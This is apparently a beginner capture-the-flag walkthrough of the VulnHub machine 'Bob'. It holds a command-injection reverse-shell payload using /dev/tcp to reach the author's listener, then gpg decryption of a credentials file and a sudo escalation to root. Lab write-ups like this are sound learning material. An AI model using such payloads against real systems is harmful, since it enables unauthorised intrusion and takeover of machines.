This is a vulnerable machine BOB from vulnhub, Rumors says this is good beginner-intermediate machine, which is actually true. So without furthur ado, let’s start!!!
Initially, recon about the target is important, so i did like:-
Well, the scanning results gave a lot of information. As the webpage is open,
so i enumerated the page and found the strange string when reviewing code, Clearly it was base 64 encoded.
Okay, so we got some intel,
During the initial recon, we found the another webpage, that contains webshell, i tried to abuse with simple commands but seems it got filtered, so I went with my another technique, i used the payload
id & /bin/bash -c ‘/bin/bash>/dev/tcp/192.168.230.128/4444 0>&1 2>&1 &’.
At the same time, my nc was listening at the same time in my shell, and yes!!! we got a shell after code execution on webpage.
After internal recon, there’s a file.old_passwordfile.html, hmm we got jc credentials
Through internal recon there’s a file called notes.sh echoing some text, so let’s keep it aside but there’s also another file login.txt.gpg which was initially hard to decrypt, so the clue was in the file notes.sh. Each letter is in capitals, so if you combine all the letters, you’ll form a word HARPOCRATES.
Now let’s do some gpg magic, run the following command :-
gpg — batch — passphrase HARPOCRATES -d login.txt.gpg
Okay so we got some text, seems like bob credentials.
After bob’s login, i ran sudo -l and after observing all the results, I ran sudo /bin/bash, and we are root!!!!
That’s all for know, if you faced any issue or if there’s any issue by my side, please let me know
LinkedIn :- https://www.linkedin.com/in/user-neeleshpatel/
Until Next Time,
— — — — — — — — — -